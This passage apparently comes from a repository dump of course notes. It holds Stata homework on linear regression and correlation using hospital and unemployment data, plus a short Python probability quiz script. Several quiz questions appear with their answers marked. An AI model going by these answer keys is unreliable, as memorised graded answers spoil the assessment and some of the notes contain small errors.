hospital.\n\n### Amount of variability explained by my covariate ###\n> I can look at the **r²**. For this model my **r²=0.4329**. 
\n> r² is known as the coefficient of determination, and in this example it tells us:\n> * that 43% of the variability among the observed values of *recommendyes*, \n> * the outcome, 40% of that variability is explained by the linear relationship with *nursealways*.\n> * the remaining 57% of the variability is unexplained, implying that there are other factors that contribute to whether the percent of patients\n> * the remaining 57% of the variability is unexplained, implying that there are other factors that contribute to the variability in this *recommendyes* outcome.\n\n### Analyze by plot ###\n\n#### Residual versus fitted plot ####\n```stata\n\trvfplot\n```\n\n> What I'm looking for here is I don't want to see any trends in these residuals.\n> * I see that they're about means 0.\n> * I don't see any weird trends going on.\n> * If I saw any U shapes or the residuals getting larger over time, these would be problems.\n> \n> So as long as you don't see any patterns in that residual plot, that **means your model's probably doing OK**.\n\n#### Residual versus predictor plot ####\n```stata\n\trvpplot nursealways\n```\n\n> So I can look at the residuals now as a function of the covariate in the model. \n> And again, I don't see any major trends in this residual plot. Things look OK, so I can assume that the fit of my model looks OK. \n> * I don't see any major outliers.\n> * I don't see anywhere trends in my residuals.\n> \n> However, there's really typically never a definitive answer to whether your **model fit is good**.\n\n#### Predict the expected percent of patients ####\n> The next thing I want to do is I want to predict the expected percent of patients who will always recommend the hospital when the percent of nurses who always communicate well is 80%\n\n> ⁻y_i|x_i=80 \n\n> So what I want to do is I want to look at the average value of Yi when Xi is equal to 80. 
And the way that I can estimate that guy is I can say this is equal to alpha hat plus beta hat times, and I just plug in 80 for Xi.\n\n> y_i= ^α + ^β*80=73.54339\n\n```stata\n\tlincom _cons + nursealways*80\n```\n\n recommendyes | Coef. | Std. Err. | t | P>|t| | [95% Conf. | Interval]\n------------- | ---------- | ----------- | ------- | ------- | ------------ | -----------\n 1 | 73.54339 | 0.1399631 | 525.45 | 0.000 | 73.26897 | 73.8178\n\n\n## Simple Linear Regression ##\nConsider the following linear regression model. We have a continuous outcome and a continuous explanatory covariate for *n* different independent observations. Notation:\n* Y_i = outcome for i = 1,...,n\n* X_i = covariate for i = 1,...,n\n\nWe fit the linear regression model: \n```math\n\tY_i = α + β*X_i + ε_i\n```\nwhere ε_i ~ N(0,σ²). \n \nAsume the assumptions for simple linear regression are met.\n\nTrue or false:\n\n#### 1. If β is positive, the Pearson correlation will always be positive. ####\n* **=> True**\n* False\n\n#### 2. If β is positive, the Spearman correlation will always be positive. ####\n* True\n* **=> False**\n\n#### 3. α is defined as the value of Y_i when X_i=0. ####\n* True\n* **=> False**\n\n#### 4. We can predict the expected value of Y_i given X_i. ####\n* **=> True**\n* False\n\n#### 5. The variance of Y_i is σ². ####\n* True\n* **=> False**\n\n## Tutorial: Indicator Variables and Regression ##\nVideo: https://s3.amazonaws.com/edx-course-videos/harvard-ph270x/H-PH207X-FA12-T10-21_100.mp4 \n\n### State your model ###\nY_i = % patients in hospital who always recommend the hospital (i=1,...,3570) \nD_i = 1 - Means that at least 75% of the patients in that hospital said that the nurse always communicates well \nD_i = 0 - Means less then 75% communicate well \n\n```math\n\tY_i = α + β*D_i + ε_i\n```\nwhere ε_i ~ N(0,σ²). 
\n \n\n```stata\n\tgen highnurse = .\n\treplace highnurse = 1 if nursealways >= 75 & nursealways < .\n\treplace highnurse = 0 if nursealways < 75\n\tregress recommendyes highnurse\n\txi: regress recommendyes i.highnurse\n\tttest recommendyes, by(highnurse)\n```\n\nFormular which we get out:\n```math\n\tY_i = 62.86 + 9.98*D_i + ε_i\n```\nwhere ε_i ~ N(0,8.5402²). \n \n^E(Y_i|D_i=1) = α + β*(1) \n^E(Y_i|D_i=0) = α + β*(0) \n \nH_0: β=0 \nH_A: β!=0 \n\n## Indicator Variables and Regression ##\nConstruct a categorical covariate for quietalways, defined by dividing quietalways into four quartiles. \n\n```stata\n\txtile quietcat = quietalways, nquan(4)\n```\n\nFit three different regression models with recommendyes as your outcome and using the following explanatory covariates:\n* quietalways \n```stata\n\tregress recommendyes quietalways\n```\n* quietcat (treat this as a continuous covariate) \n```stata\n\tregress recommendyes quietcat\n```\n* quietcat (treat this as a categorical covariate) \n```stata\n\txi: regress recommendyes i.quietcat\n```\n\n#### 1. Think about the assumptions of linear regression. Suppose you tested whether all of the regression coefficients in model three, except for the intercept, are equal to zero. Would you expect this test to produce similar results as a one-way ANOVA model? ####\n* Yes\n* No \n\n#### 2. Compare the t-statistics between model 1 and model 2. Examine the scatter plot of recommendyes versus quietalways. Do these two pieces of evidence suggest that, when you categorize and the relationship between two variables is truly linear, you lose power. #### \n* Yes\n* No \n\n\nConsider models 1-3. On the discussion boards below, compare the three models and discuss the tradeoffs of categorizing versus leaving variables as continuous. For instance, what if the relationship between the outcome and covariate was non-linear (e.g. 
quadratic/U-shaped)?\n" }, { "alpha_fraction": 0.7055555582046509, "alphanum_fraction": 0.7222222089767456, "avg_line_length": 29, "blob_id": "45a16e61796825d6dcbd295f466f22d81dbdd905", "content_id": "b76db1b9507d39f40cfb5516e8fc30feb6a90202", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 360, "license_type": "no_license", "max_line_length": 106, "num_lines": 12, "path": "/CS373/Unit-1/unit-1_4.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Uniform-Probability-Quiz \n# Robot Localization\n\n# We have 5 different cells where each cell has the same probability that the robot might be in that cell.\n# So probabilities add up to 1\n# Quiz from x1 to x5\n# -> What is the probability of any of those x's?\nimport decimal\n\nn = decimal.Decimal(5)\np_xi = 1/n\nprint \"-> The probability of any x's is %f\" % p_xi\n" }, { "alpha_fraction": 0.6844106316566467, "alphanum_fraction": 0.7129277586936951, "avg_line_length": 33.40187072753906, "blob_id": "4daeaf3eca98c8907102ae5272926ba2bf8aa003", "content_id": "6021ed3193af701a0738808a69e44aeabef4a349", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3684, "license_type": "no_license", "max_line_length": 267, "num_lines": 107, "path": "/PH207x/homework/nine/Trends in Unemployment.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "## Trends in Unemployment ##\n> We again use publicly available data from the World Bank’s website to examine national trends in unemployment percentages (percent unemployed in total labor force) in four countries: the United States, Great Britain, Japan, and Canada. \n> \nIn this question, we examine unemployment trends over time using a correlation analysis, focusing primarily on the United States and Japan. \n> \n> Use the dataset UnemploymentbyCountry.dta to answer the following questions. 
\n\n```stata\n\tuse \"UnemploymentbyCountry.dta\"\n```\n\n### Consider the following questions: ###\n\n#### 1. Calculate the Pearson and Spearman correlations between total unemployment and year for the United States and for Japan. ####\n\n##### United States: ######\n* Pearson: **-0.3415**\n* Spearman: **-0.4517**\n\n```stata\n\tpwcorr unemployedtotal year if country == \"United States\", sig\n```\n\n```stata\n\tspearman unemployedtotal year if country == \"United States\"\n```\n\n##### Japan: ######\n* Pearson: **0.8437**\n* Spearman: **0.8162**\n\n```stata\n\tpwcorr unemployedtotal year if country == \"Japan\", sig\n```\n\n```stata\n\tspearman unemployedtotal year if country == \"Japan\"\n```\n\n#### 2. Exclude all years after 2007 (recall that the financial collapse occurred in late 2008). Recalculate the correlations in question 1. (Hint: use an \"if\" command to restrict to certain years in Stata.) ####\n\n##### United States: ######\n* Pearson: **-0.7557**\n* Spearman: **-0.7733**\n\n```stata\n\tpwcorr unemployedtotal year if country == \"United States\" & year < 2008, sig\n```\n\n```stata\n\tspearman unemployedtotal year if country == \"United States\" & year < 2008\n```\n\n##### Japan: ######\n* Pearson: **0.8276**\n* Spearman: **0.7998**\n\n```stata\n\tpwcorr unemployedtotal year if country == \"Japan\" & year < 2008, sig\n```\n\n```stata\n\tspearman unemployedtotal year if country == \"Japan\" & year < 2008\n```\n\n\n#### 3. Construct a scatter plot with year on the x-axis and with both unemployment in the United States and unemployment in Japan on the y-axis. ####\n> **Hint1:** try plotting different symbols for the United States and Japan by creating two different plots within the Twoway graphs window; restrict to a specific country by using an \"if\" statement within each plot window).\n\n##### Which pattern best describes the trend in unemployment in the United States between 1980 and 2010? 
##### \n* linear \n* quadratic \n* => **cyclic**\n* gradual non-linear increase \n\n```stata\n\ttwoway (connected unemployedtotal year if country==\"United States\") if year > 1979 & year < 2011\n```\n\n##### Which pattern best describes the trend in unemployment in the Japan between 1980 and 2010? #####\n* linear \n* quadratic \n* cyclic\n* **gradual non-linear increase** \n\n```stata\n\ttwoway (connected unemployedtotal year if country==\"Japan\") if year > 1979 & year < 2011\n```\n\n\n#### 4. True or False: correlation analyses have the potential to mask important non-linear trends in data. ####\n> **Hint1:** Can correlation analysis hide non-linear relationships.\n* => **True**\n* False\n\n\nAre there not other methods to analyze non linear relationship like spearman and rank test? \n\nSpearman and rank are used for not normal distributed data. In Q4 we are interested about \"non-linear trends\". And this is a big difference.\n\n#### 5. Restricting to the United States, construct a scatterplot with year on the x-axis and with total unemployment; unemployment among women; and unemployment among men on the y-axis. Do there appear to be sex-specific differences in the unemployment trends? #### \n* True\n* **False**\n\n```stata\n\ttwoway (scatter unemployedf year if country==\"United States\", sort) (scatter unemployedm year if country==\"United States\", sort)\n```\n\n" } ]
70
AbelSu131/mysite
https://github.com/AbelSu131/mysite
cf026dca30ad38ee93d2cde86310fda6ae39ab3d
fb2369a5dd96c96a425f3d8a2b83c7cacf13cc73
56c08b82e9acce35471a8d0b1b15e11864f514a0
refs/heads/master
2021-01-13T00:43:03.417544
2015-11-15T13:54:40
2015-11-15T13:54:40
46,219,327
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6849315166473389, "alphanum_fraction": 0.7191780805587769, "avg_line_length": 23.33333396911621, "blob_id": "18ff001fb4797293653751d7203a610a74c73106", "content_id": "9a3e0d0f6327371ecf1d3d404ef310c19d1af59a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 148, "license_type": "no_license", "max_line_length": 70, "num_lines": 6, "path": "/README.md", "repo_name": "AbelSu131/mysite", "src_encoding": "UTF-8", "text": "###mysite\n\n####This is my first Django Project\n\n####Effect as shown below:\n![image](https://github.com/AbelSu131/mysite/blob/master/django01.JPG)\n" }, { "alpha_fraction": 0.6618556976318359, "alphanum_fraction": 0.6639175415039062, "avg_line_length": 33.71428680419922, "blob_id": "3350116492726cc44c5c9e162ccac548b27be920", "content_id": "45b240d5bfc1abb5564daab159cb126bb1100db2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 591, "license_type": "no_license", "max_line_length": 68, "num_lines": 14, "path": "/mysite/blog/views.py", "repo_name": "AbelSu131/mysite", "src_encoding": "UTF-8", "text": "# coding=utf-8\nfrom django.shortcuts import render\nfrom blog.models import BlogsPost\nfrom django.shortcuts import render_to_response\n\n# Create your views here.\ndef index(request):\n # 获取数据库里面所拥有的BlogPost对象\n blog_list = BlogsPost.objects.all()\n hello = '欢迎来到我的博客'\n #render_to_response()返回一个页面(index.html)\n # 顺带把数据库中查询出来的所有博客内容(blog_list)也一并返回。\n return render_to_response('index.html', {'blog_list': blog_list,\n 'hi': hello })" } ]
2
SHANK885/realtime_face_recognition
https://github.com/SHANK885/realtime_face_recognition
325864fad6ce8f6f2601e730c9dfa24c27364f3a
4cb3555e58990a4b853dc21af01b13d06e899c2c
fd5b8455296a5791780589967ccf3b76c7f34a07
refs/heads/master
2020-09-24T19:45:10.871615
2019-12-07T16:38:37
2019-12-07T16:38:37
225,828,637
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.5104241371154785, "alphanum_fraction": 0.5238437652587891, "avg_line_length": 31.6015625, "blob_id": "93cafa1dd34a6c9d415429cd7ab56e99db949112", "content_id": "a6ebaccebea89efda1938922681343ba7c4135a6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4173, "license_type": "permissive", "max_line_length": 78, "num_lines": 128, "path": "/enroll_face.py", "repo_name": "SHANK885/realtime_face_recognition", "src_encoding": "UTF-8", "text": "from keras import backend as K\nfrom fr_utils import *\nfrom inception_blocks_v2 import *\nfrom triplet_loss import triplet_loss\nimport numpy as np\nimport json\nimport cv2\nimport sys\nimport os\nimport argparse\nK.set_image_data_format('channels_first')\n\ndef main(args):\n image_path = \"./database/images/\"\n embedding_path = \"./database/embeddings/embeddings.json\"\n face_detector_path = \"./classifiers/haarcascade_frontalface_default.xml\"\n\n image_path = os.path.join(image_path, args.name + \".png\")\n\n video_capture = cv2.VideoCapture(0)\n face_detector = cv2.CascadeClassifier(face_detector_path)\n\n print(\"*********Initializing Face Enrollment*************\\n\")\n\n\n while True:\n while True:\n if video_capture.isOpened():\n ret, frame = video_capture.read()\n\n raw_frame = frame.copy()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_detector.detectMultiScale(gray,\n scaleFactor=1.5,\n minNeighbors=5,\n minSize=(30, 30))\n print(\"length of faces: \", len(faces))\n print(\"faces:\\n\", faces)\n if len(faces) == 0:\n continue\n else:\n areas = [w*h for x, y, w, h in faces]\n i_biggest = np.argmax(areas)\n bb = faces[i_biggest]\n\n cv2.rectangle(frame,\n (bb[0], bb[1]),\n (bb[0]+bb[2], bb[1]+bb[3]),\n (0, 255, 0),\n 2)\n\n cropped = raw_frame[bb[1]:bb[1]+bb[3], bb[0]:bb[0]+bb[2]]\n image = cv2.resize(cropped,\n (96, 96),\n interpolation=cv2.INTER_LINEAR)\n\n cv2.imshow(\"Video\", frame)\n if cv2.waitKey(1) & 0xFF == 
ord('s'):\n print(\"Face Captured for: {}\".format(args.name))\n break\n\n print(\"Press 'C' to confirm this image\")\n print(\"Press 'R' to retake the picture\")\n\n response = input(\"\\nEnter Your Response: \")\n\n if response == \"C\" or response == \"c\":\n print(\"\\nImage finalized\\n\")\n video_capture.release()\n cv2.destroyAllWindows()\n break\n if response == \"R\" or response == \"r\":\n cv2.destroyAllWindows()\n continue\n\n if os.path.exists(image_path):\n print(\"Member with name: {} already exists!!\".format(args.name))\n print(\"Press 'C' to overwrite or 'R' to return\")\n val = input(\"Enter response:\")\n if val == 'r' or val == 'R':\n return\n elif val == 'c' or val == 'C':\n cv2.imwrite(image_path, image)\n print(\"image saved\")\n else:\n cv2.imwrite(image_path, image)\n print(\"image saved _\")\n\n FRmodel = faceRecoModel(input_shape=(3, 96, 96))\n print(\"Total Params:\", FRmodel.count_params())\n\n # load trained model\n FRmodel.compile(optimizer='adam', loss=triplet_loss, metrics=['accuracy'])\n load_weights_from_FaceNet(FRmodel)\n\n embedding = img_to_encoding(image_path, FRmodel)[0].tolist()\n print(type(embedding))\n print(embedding)\n print(len(embedding))\n print(\"embedding created\")\n\n try:\n with open(embedding_path, 'r') as rf:\n base_emb = json.load(rf)\n except IOError:\n print(\"Embeddibg file empty!! 
Creating a new embedding file\")\n with open(embedding_path, 'w+') as rf:\n base_emb = {}\n with open(embedding_path, 'w') as wf:\n base_emb[args.name] = embedding\n json.dump(base_emb, wf)\n print(\"embedding written\")\n\n print(\"face enrolled with name => {}\".format(args.name))\n\n\ndef parse_arguments(argv):\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('name',\n type=str,\n help='Add the name of member to be added.')\n\n return parser.parse_args(argv)\n\nif __name__ == '__main__':\n main(parse_arguments(sys.argv[1:]))\n" }, { "alpha_fraction": 0.5926156044006348, "alphanum_fraction": 0.6099907159805298, "avg_line_length": 55.543861389160156, "blob_id": "a4192ebfc34f92ff5b65673fbdc0a022c1a4161d", "content_id": "f06e0e6f68c7c66aa7801fa97906d47fe43c111d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6446, "license_type": "permissive", "max_line_length": 398, "num_lines": 114, "path": "/README.md", "repo_name": "SHANK885/realtime_face_recognition", "src_encoding": "UTF-8", "text": "---------------------------------------------------------------------------------------------------\n# Realtime Face Recognition\n\nFace recognition problems commonly fall into two categories:\n\n * Face Verification - \"is this the claimed person?\". For example, at some airports, you can pass through customs by letting a system scan your passport and then verifying that you (the person carrying the passport) are the correct person. A mobile phone that unlocks using your face is also using face verification. This is a 1:1 matching problem.\n * Face Recognition - \"who is this person?\". This is a 1:K matching problem.\n \nFaceNet learns a neural network that encodes a face image into a vector of 128 numbers. 
By comparing two such vectors, you can then determine if two pictures are of the same person.\n\n--------------------------------------------------------------------------------------------------\n### Encoding face images into a 128-dimensional vector\n\n--------------------------------------------------------------------------------------------------\n#### Using an ConvNet to compute encodings\n\n\nThe FaceNet model takes a lot of data and a long time to train. So following common practice in applied deep learning settings, let's just load weights that someone else has already trained. The network architecture follows the Inception model from [Szegedy et al.](https://arxiv.org/abs/1409.4842). We have provided an inception network implementation. You can look in the file inception_blocks.py\n\nThe key things you need to know are:\n\n * This network uses 96x96 dimensional RGB images as its input. Specifically, inputs a face image (or batch of m face images) as a tensor of shape (m, n_C, n_H, n_W) = (m, 3, 96, 96)\n * It outputs a matrix of shape (m, 128) that encodes each input face image into a 128-dimensional vector\n\n--------------------------------------------------------------------------------------------------\n#### Expected Output\n\nBy using a 128-neuron fully connected layer as its last layer, the model ensures that the output is an encoding vector of size 128. 
You then use the encodings the compare two face images as follows:\n\n\n<p align=\"center\"><img width=\"100%\" src=\"https://github.com/SHANK885/realtime_face_recognition/blob/master/images/distance_kiank.png\" /></p>\n\nSo, an encoding is a good one if:\n\n * The encodings of two images of the same person are quite similar to each other\n * The encodings of two images of different persons are very different\n\nThe triplet loss function formalizes this, and tries to \"push\" the encodings of two images of the same person (Anchor and Positive) closer together, while \"pulling\" the encodings of two images of different persons (Anchor, Negative) further apart.\n\n<p align=\"center\"><img width=\"100%\" src=\"https://github.com/SHANK885/realtime_face_recognition/blob/master/images/triplet_comparison.png\" /></p>\n\n\n--------------------------------------------------------------------------------------------------\n### Platform Secification:\n\n * Ubuntu 18.04\n\n\n--------------------------------------------------------------------------------------------------\n### Requirements:\n \n * tensorflow==1.15.0\n * sklearn==0.21.3\n * Python==3.7.4\n * OpenCV==4.1.2\n * NumPy==1.17.2\n \n \n-------------------------------------------------------------------------------------------------- \n### Setup\n\n * Clone this [repository](https://github.com/SHANK885/realtime_face_recognition.git)\n \n \n-------------------------------------------------------------------------------------------------- \n### Enroll a new face using webcam.\n\n 1. Go inside realtime_face_recognition directory.\n 2. run \"python enroll_face.py <name_of_new_member>\n 3. Webcam will open up with a window to capture face.\n 4. Press 's' by selectiong the video window to capture the image.\n 5. 
If you want to recapture the image:\n select the terminal window and enter \"R\" or \"r\" else enter \"C\" or \"c\".\n\n It will enroll the new face with the name provided in the command line.\n\n \n The cropped and aligned face will be saved to:\n realtime_face_recognition/database/images/ directory\n \n The 128 D face embedding vector will be added to:\n realtime_face_recognition/database/embeddings/face_embeddings.json\n\n\n--------------------------------------------------------------------------------------------------\n### Where the image is stored ?\n\n * The cropped faces of all te enrolled members is stored in:\n [realtime_face_recognition/database/images/ directory](https://github.com/SHANK885/realtime_face_recognition/tree/master/database/images)\n * The embeddings of all the enrolled faces is present in:\n [realtime_face_recognition/database/embeddings/<emb> directory](https://github.com/SHANK885/realtime_face_recognition/tree/master/database/embeddings)\n \n \n--------------------------------------------------------------------------------------------------\n### What is does?\n\nOur realtime face recognition is able to recognize the faces of all the members that is enrolled in the database. However, if a face is not enrolled it will make it as unknown.\n\n\n--------------------------------------------------------------------------------------------------\n### How to run FaceNet Realtime Recognition.\n\n * Enroll the faces you want by following the above steps.\n * Go to the realtime_face_recognition directory.\n * run realtime_recognition.py.\n * It will be able to recognize the faces that are present in the database and will mark a face unknown if it is not registered.\n \n--------------------------------------------------------------------------------------------------\n### References\n\n * Florian Schroff, Dmitry Kalenichenko, James Philbin (2015). 
[FaceNet: A Unified Embedding for Face Recognition and Clustering](https://arxiv.org/pdf/1503.03832.pdf)\n * Yaniv Taigman, Ming Yang, Marc'Aurelio Ranzato, Lior Wolf (2014). [DeepFace: Closing the gap to human-level performance in face verification](https://research.fb.com/wp-content/uploads/2016/11/deepface-closing-the-gap-to-human-level-performance-in-face-verification.pdf)\n * The pretrained model we use is inspired by Victor Sy Wang's implementation and was loaded using his code: [https://github.com/iwantooxxoox/Keras-OpenFace](https://github.com/iwantooxxoox/Keras-OpenFace)\n * Our implementation also took a lot of inspiration from the official FaceNet github repository: [https://github.com/davidsandberg/facenet](https://github.com/davidsandberg/facenet)\n" }, { "alpha_fraction": 0.5542551279067993, "alphanum_fraction": 0.574092447757721, "avg_line_length": 31.947711944580078, "blob_id": "f93cd90b8c38d24b35dab04bb84751aaca65abc0", "content_id": "d4331c16ea10a0efef56c5ab8bf65bb982fadd30", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5049, "license_type": "permissive", "max_line_length": 114, "num_lines": 153, "path": "/realtime_recognition.py", "repo_name": "SHANK885/realtime_face_recognition", "src_encoding": "UTF-8", "text": "from keras.models import Sequential\nfrom keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate\nfrom keras.models import Model\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.pooling import MaxPooling2D, AveragePooling2D\nfrom keras.layers.merge import Concatenate\nfrom keras.layers.core import Lambda, Flatten, Dense\nfrom keras.initializers import glorot_uniform\nfrom keras.engine.topology import Layer\nfrom keras import backend as K\n\nK.set_image_data_format('channels_first')\nimport cv2\nimport json\nimport os\nimport numpy as np\nfrom numpy import genfromtxt\nimport pandas as pd\nimport tensorflow as tf\nfrom 
fr_utils import *\nfrom triplet_loss import triplet_loss\nfrom inception_blocks_v2 import *\n\n\n\ndef create_encoding(image, model):\n img = image[...,::-1]\n img = np.around(np.transpose(img, (2,0,1))/255.0, decimals=12)\n x_train = np.array([img])\n embedding = model.predict_on_batch(x_train)\n return embedding\n\n\n\ndef who_is_it(image_path, database, model):\n \"\"\"\n Arguments:\n image_path -- path to an image\n database -- database containing image encodings along with the name of the person on the image\n model -- your Inception model instance in Keras\n\n Returns:\n min_dist -- the minimum distance between image_path encoding and the encodings from the database\n identity -- string, the name prediction for the person on image_path\n \"\"\"\n\n ### START CODE HERE ###\n\n ## Step 1: Compute the target \"encoding\" for the image. Use img_to_encoding() see example above. ## (≈ 1 line)\n encoding = create_encoding(image_path, model)\n\n ## Step 2: Find the closest encoding ##\n\n # Initialize \"min_dist\" to a large value, say 100 (≈1 line)\n min_dist = 100\n\n # Loop over the database dictionary's names and encodings.\n for (name, db_enc) in database.items():\n\n # Compute L2 distance between the target \"encoding\" and the current \"emb\" from the database. (≈ 1 line)\n dist = np.linalg.norm(encoding-db_enc)\n\n # If this distance is less than the min_dist, then set min_dist to dist, and identity to name. 
(≈ 3 lines)\n if dist < min_dist:\n min_dist = dist\n identity = name\n\n ### END CODE HERE ###\n\n if min_dist > 0.85:\n print(\"Not in the database.\")\n print(\"distance\", min_dist)\n identity = \"Unknown\"\n else:\n print (\"it's \" + str(identity) + \", the distance is \" + str(min_dist))\n\n return min_dist, identity\n\n\ndef main():\n\n embedding_path = \"./database/embeddings/embeddings.json\"\n face_detector_path = \"./classifiers/haarcascade_frontalface_default.xml\"\n\n FRmodel = faceRecoModel(input_shape=(3, 96, 96))\n print(\"Total Params:\", FRmodel.count_params())\n\n # load trained model\n FRmodel.compile(optimizer='adam', loss=triplet_loss, metrics=['accuracy'])\n load_weights_from_FaceNet(FRmodel)\n\n with open(embedding_path, 'r') as infile:\n database = json.load(infile)\n\n #who_is_it(\"images/camera_0.jpg\", database, FRmodel)\n video_capture = cv2.VideoCapture(0)\n video_capture.set(cv2.CAP_PROP_FRAME_WIDTH, 960)\n video_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 540)\n\n face_detector = cv2.CascadeClassifier(face_detector_path)\n\n print(\"above while\")\n while True:\n # capture frame\n if video_capture.isOpened():\n ret, frame = video_capture.read()\n\n raw_frame = frame.copy()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_detector.detectMultiScale(gray,\n scaleFactor=1.5,\n minNeighbors=5,\n minSize=(30, 30))\n if len(faces) > 0:\n for (x, y, w, h) in faces:\n cropped = raw_frame[y:y+h, x:x+w]\n image = cv2.resize(cropped,\n (96, 96),\n interpolation=cv2.INTER_LINEAR)\n min_dist, identity = who_is_it(image, database, FRmodel)\n\n if identity == 'Unknown':\n box_color = (0, 0, 255)\n text_color = (0, 0, 255)\n else:\n box_color = (0, 255, 0)\n text_color = (255, 0, 0)\n\n cv2.rectangle(frame,\n (x, y),\n (x+w, y+h),\n box_color,\n 2)\n cv2.putText(frame,\n identity,\n (x, y),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.75,\n text_color,\n thickness=2,\n lineType=2)\n\n cv2.imshow('Realtime Recognition', frame)\n\n if cv2.waitKey(1) & 
0xFF == ord('q'):\n break\n\n video_capture.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.616122841835022, "alphanum_fraction": 0.642994225025177, "avg_line_length": 39.07692337036133, "blob_id": "9e5c44aa858b6ce4ee8857d2a2eedc381d6fb6d0", "content_id": "39a7a074d35ced23cfce417b8ac8bd0c7c8059a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1563, "license_type": "permissive", "max_line_length": 104, "num_lines": 39, "path": "/triplet_loss.py", "repo_name": "SHANK885/realtime_face_recognition", "src_encoding": "UTF-8", "text": "# triplet loss\nimport tensorflow as tf\n\ndef triplet_loss(y_true, y_pred, alpha=0.2):\n '''\n Arguments:\n y_true -- true labels, required when you define a loss in Keras, you don't need it in this function.\n y_pred -- python list containing three objects:\n anchor -- the encodings for the anchor images, of shape (None, 128)\n positive -- the encodings for the positive images, of shape (None, 128)\n negative -- the encodings for the negative images, of shape (None, 128)\n\n Returns:\n loss -- real number, value of the loss\n '''\n anchor, positive, negative = y_pred[0], y_pred[1], y_pred[2]\n\n # compute the encoding distance between the anchor and the positive,\n # need to sum over the axis -1\n pos_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, positive)))\n # compute the encoding distance between the anchor and the negative\n # need to sum over the axis -1\n neg_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, negative)))\n basic_loss = pos_dist - neg_dist + alpha\n # take the maximum of bsic loss and 0.0 sum over the training examples\n loss = tf.reduce_sum(tf.maximum(basic_loss, 0))\n\n return loss\n\n\nwith tf.Session() as test:\n tf.set_random_seed(1)\n y_true = (None, None, None)\n y_pred = (tf.random_normal([3, 128], mean=6, stddev=0.1, seed=1),\n tf.random_normal([3, 128], mean=1, stddev=1, 
seed=1),\n tf.random_normal([3, 128], mean=3, stddev=4, seed=1))\n loss = triplet_loss(y_true, y_pred)\n\n print(\"loss = \", str(loss.eval()))\n" } ]
4
aki-06/FastAPI_ML
https://github.com/aki-06/FastAPI_ML
38c76a6b46f9d592a6eb6a56470ee2d1dd087e44
d0ff45be8e363f7be9f748bfd864306d0cf31d58
36dbc19b67c3f1eeb794964b122e9b4b6d096a9d
refs/heads/master
2023-04-27T09:03:30.266949
2020-07-17T14:28:07
2020-07-17T14:28:07
279,079,432
0
0
null
2020-07-12T14:18:07
2020-07-17T14:28:31
2021-05-13T20:59:22
Python
[ { "alpha_fraction": 0.6223404407501221, "alphanum_fraction": 0.6223404407501221, "avg_line_length": 14.75, "blob_id": "dcd8c9821c2d516e823052aad8b5a4188a68c123", "content_id": "dfce51cadac3f02b5e3addcf0ca75e303ab47f9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 188, "license_type": "no_license", "max_line_length": 28, "num_lines": 12, "path": "/api/src/app.py", "repo_name": "aki-06/FastAPI_ML", "src_encoding": "UTF-8", "text": "from fastapi import FastAPI\n\n\napp = FastAPI()\n\[email protected]('/')\nasync def index():\n return {\"text\": \"Hello\"}\n\[email protected]('/items/{name}')\nasync def get_items(name):\n return {\"name\": name}" }, { "alpha_fraction": 0.7231638431549072, "alphanum_fraction": 0.7401130199432373, "avg_line_length": 21.25, "blob_id": "74ca8f381fbad2f42f3f504fe3b6f2ac6c5f3411", "content_id": "74e524f99dc0f12ecdafaf7775f27908f045d08f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 177, "license_type": "no_license", "max_line_length": 35, "num_lines": 8, "path": "/api/Dockerfile", "repo_name": "aki-06/FastAPI_ML", "src_encoding": "UTF-8", "text": "FROM python:3.8\nENV PYTHONUNBUFFERED 1\nRUN mkdir /src\nWORKDIR /src\nCOPY requirements.txt /src\nRUN pip install --upgrade pip && \\\n pip install -r requirements.txt\nCOPY . /src/" } ]
2
AP-MI-2021/lab-2-andreeabejinariu0
https://github.com/AP-MI-2021/lab-2-andreeabejinariu0
f88b604698828507c9ec55bffccc9b9e63244047
998576a9f19455ddec9d76efff4a3047ee29768d
50ec6147e4af9723c8c48c8ed1ed29e1c195e411
refs/heads/main
2023-08-17T15:55:52.193834
2021-10-06T09:19:17
2021-10-06T09:19:17
413,364,496
0
0
null
null
null
null
null
